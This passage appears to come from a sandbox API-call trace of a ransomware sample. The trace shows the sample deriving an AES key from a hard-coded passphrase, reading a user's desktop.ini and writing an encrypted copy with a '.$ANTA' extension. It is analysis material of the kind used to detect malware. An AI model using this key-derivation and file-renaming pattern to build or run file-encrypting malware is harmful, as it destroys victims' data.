HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.664] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.664] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0096.664] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.665] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.665] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca310, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0096.665] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0096.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0096.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0096.665] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0096.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0096.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0096.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca418, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0096.666] CryptHashData (hHash=0x41ac180, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0096.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.666] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0096.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca340, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0096.666] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0096.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0096.667] CryptDestroyHash (hHash=0x41ac180) returned 1 [0096.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0096.667] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.667] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0096.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0096.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0096.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0096.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0096.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0096.668] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0096.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0096.669] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0096.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0096.669] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0096.670] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0096.670] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0096.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0096.675] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0096.675] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x1f8, lpOverlapped=0x0) returned 1 [0096.675] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0096.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0096.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0096.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43cce80 [0096.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0096.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0096.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0096.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0096.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43e8288 [0096.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cce80 | out: hHeap=0x1780000) returned 1 [0096.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0096.742] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0096.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0096.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0096.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43cce80 [0096.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cce80 | out: hHeap=0x1780000) returned 1 [0096.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.743] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0096.743] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0096.743] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43cce80 [0096.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0096.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0096.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0096.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0d0 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43e8a88 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0096.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0096.745] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0096.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0096.745] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0096.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0096.745] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0096.745] HeapFree (in: 